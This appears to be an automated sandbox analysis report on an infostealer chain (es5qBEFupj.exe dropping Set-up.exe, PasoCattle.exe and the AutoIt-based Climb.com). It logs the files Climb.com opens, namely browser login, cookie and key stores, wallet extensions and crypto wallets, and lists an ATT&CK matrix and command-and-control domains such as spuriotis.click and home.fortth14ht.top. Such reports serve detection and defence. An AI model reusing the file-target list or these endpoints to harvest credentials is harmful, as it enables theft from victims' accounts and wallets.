                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Climb.comBinary or memory string: WIN_81
                Source: Climb.comBinary or memory string: WIN_XP
                Source: Alt.18.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Climb.comBinary or memory string: WIN_XPe
                Source: Climb.comBinary or memory string: WIN_VISTA
                Source: Climb.comBinary or memory string: WIN_7
                Source: Climb.comBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: Yara matchFile source: 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 7780, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 7780, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00132263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,21_2_00132263
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00131C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,21_2_00131C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol41
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)2
                Valid Accounts
                4
                Obfuscated Files or Information
                Security Account Manager13
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login Hook21
                Access Token Manipulation
                12
                Software Packing
                NTDS239
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets1171
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                Masquerading
                Cached Domain Credentials561
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync14
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job561
                Virtualization/Sandbox Evasion
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection
                Network Sniffing1
                Remote System Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581590 Sample: es5qBEFupj.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 41 spuriotis.click 2->41 43 yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 12 other signatures 2->59 9 es5qBEFupj.exe 4 2->9         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\Temp\Set-up.exe, PE32 9->35 dropped 37 C:\Users\user\AppData\...\PasoCattle.exe, PE32 9->37 dropped 39 C:\Users\user\AppData\...\es5qBEFupj.exe.log, CSV 9->39 dropped 71 Detected unpacking (changes PE section rights) 9->71 73 Tries to detect sandboxes and other dynamic analysis tools (window names) 9->73 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->75 77 5 other signatures 9->77 13 PasoCattle.exe 19 9->13         started        15 Set-up.exe 9->15         started        signatures6 process7 dnsIp8 19 cmd.exe 2 13->19         started        47 home.fortth14ht.top 194.87.58.92, 49726, 49741, 49748 RELCOM-ASRelcomGroup19022019RU Russian Federation 15->47 49 httpbin.org 34.226.108.155, 443, 49699 AMAZON-AESUS United States 15->49 51 Multi AV Scanner detection for dropped file 15->51 signatures9 process10 file11 33 C:\Users\user\AppData\Local\...\Climb.com, PE32 19->33 dropped 61 Drops PE files with a suspicious file extension 19->61 23 Climb.com 19->23         started        27 cmd.exe 2 19->27         started        29 extrac32.exe 14 19->29         started        31 8 other processes 19->31 signatures12 process13 dnsIp14 45 spuriotis.click 172.67.128.184, 443, 49754, 49760 CLOUDFLARENETUS United States 23->45 63 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 23->63 65 Query firmware table information (likely to detect VMs) 23->65 67 Found many strings related to Crypto-Wallets (likely being stolen) 23->67 69 5 other signatures 23->69 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                es5qBEFupj.exe33%VirustotalBrowse
                es5qBEFupj.exe39%ReversingLabs
                es5qBEFupj.exe100%AviraHEUR/AGEN.1313526
                es5qBEFupj.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\768400\Climb.com0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\PasoCattle.exe11%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Set-up.exe70%ReversingLabsWin32.Trojan.Amadey
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://spuriotis.click/30%Avira URL Cloudsafe
                https://spuriotis.click/0%Avira URL Cloudsafe
                https://spuriotis.click/-0%Avira URL Cloudsafe
                https://spuriotis.click:443/apiocal0%Avira URL Cloudsafe
                spuriotis.click0%Avira URL Cloudsafe
                https://spuriotis.click:443/api0%Avira URL Cloudsafe
                http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1100%Avira URL Cloudmalware
                https://spuriotis.click/api0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                spuriotis.click
                172.67.128.184
                truetrue
                  unknown
                  home.fortth14ht.top
                  194.87.58.92
                  truefalse
                    high
                    httpbin.org
                    34.226.108.155
                    truefalse
                      high
                      yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        scentniej.buzzfalse
                          high
                          http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0false
                            high
                            http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003false
                              high
                              hummskitnj.buzzfalse
                                high
                                rebuildeso.buzzfalse
                                  high
                                  appliacnesot.buzzfalse
                                    high
                                    screwamusresz.buzzfalse
                                      high
                                      cashfuzysao.buzzfalse
                                        high
                                        inherineau.buzzfalse
                                          high
                                          https://spuriotis.click/apitrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://httpbin.org/ipfalse
                                            high
                                            prisonyfork.buzzfalse
                                              high
                                              spuriotis.clicktrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://html4/loose.dtdes5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                  high
                                                  https://duckduckgo.com/chrome_newtabClimb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ocsp.sectigo.com0es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKSSet-up.exe, 00000008.00000002.1526147549.0000000000AF9000.00000004.00000001.01000000.00000008.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://.csses5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                              high
                                                              https://www.autoitscript.com/autoit3/Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.drfalse
                                                                high
                                                                https://curl.se/docs/hsts.htmlSet-up.exe.0.drfalse
                                                                  high
                                                                  https://spuriotis.click/3Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://spuriotis.click:443/apiocalClimb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
